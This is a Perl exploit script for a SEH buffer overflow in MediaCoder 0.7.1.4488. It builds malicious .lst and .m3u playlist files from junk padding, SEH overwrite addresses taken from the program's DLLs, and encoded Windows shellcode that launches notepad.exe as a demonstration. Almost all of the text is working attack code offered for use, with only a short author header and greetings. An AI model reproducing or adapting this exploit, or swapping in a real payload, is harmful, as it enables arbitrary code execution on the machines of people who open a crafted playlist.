#!/usr/bin/perl #[+] software : MediaCoder 0.7.1.4488 (.lst & .m3u) Universal Buffer overflow (SEH) #[+] Author : opt!x hacker <optix@9.cn> #[+] greetz to germaya_x because he finds an exploit in MediaCoder 0.7.1.4486 #[+] download :http://www.mediacoderhq.com/dlfull.htm #[+] tested under: SP2 (FR) ########################################################## # windows/exec - 153 bytes # Encoder: x86/jmp_call_additive # EXITFUNC=seh, CMD=notepad.exe my $shellcode= "\xfc\xeb\x11\x5e\xbf\x5c\xae\xcd\xea\x56\x31\x3e\xad\x01" . "\xc7\x85\xc0\x75\xf7\xc3\xe8\xea\xff\xff\xff\xa0\x46\x89" . "\xea\x58\x97\x99\xae\x64\x1c\xe1\x35\xec\x23\xf5\xbd\x43" . "\x3c\x82\x9d\x7b\x3d\x7f\x68\xf0\x09\xf4\x6a\xe8\x43\xca" . "\xf4\x58\x27\x0a\x72\xa7\xe9\x41\x76\xa6\x2b\xbe\x7d\x93" . "\xff\x65\x7a\x96\x1a\xee\xdd\x7c\xe4\x1a\x87\xf7\xea\x97" . "\xc3\x58\xef\x26\x3f\xed\x13\xa2\xbe\x1a\xa2\xe8\xe4\xd8" . "\x76\x4f\xd4\x16\x18\x26\x72\x5d\x9f\xf6\xf1\x21\x2c\x7c" . "\x75\xbd\x81\x09\x1e\xb5\x50\xf5\x5c\x05\x08\x56\x0b\x75" . "\x47\x52\x94\x1d\xc0\xa5\xa0\xd3\xa7\xa6\x52\x85\x28\x2d" . "\xf8\x29\xd6\xa9\x2c\xac\x60\x57\x31\x2e\x91\x97\x31";
my $junk="\x41" x 775; my $next_seh1="\x10\x00\xF3\xA2"; # call esp in mcres.dll = 0x1000F3A2 my $seh="\x31\x66\x66\x31"; # pop pop ret->mediacoder.exe open(myfile,'>>mediacoder.lst'); print myfile $junk.$next_seh1.$seh.$shellcode;
my $next_seh2="\x87\x51\x37\x00"; # jmp esp in sdl.dll open(myfile,'>>mediacoder.m3u'); print myfile $junk.$next_seh2.$seh.$shellcode;
|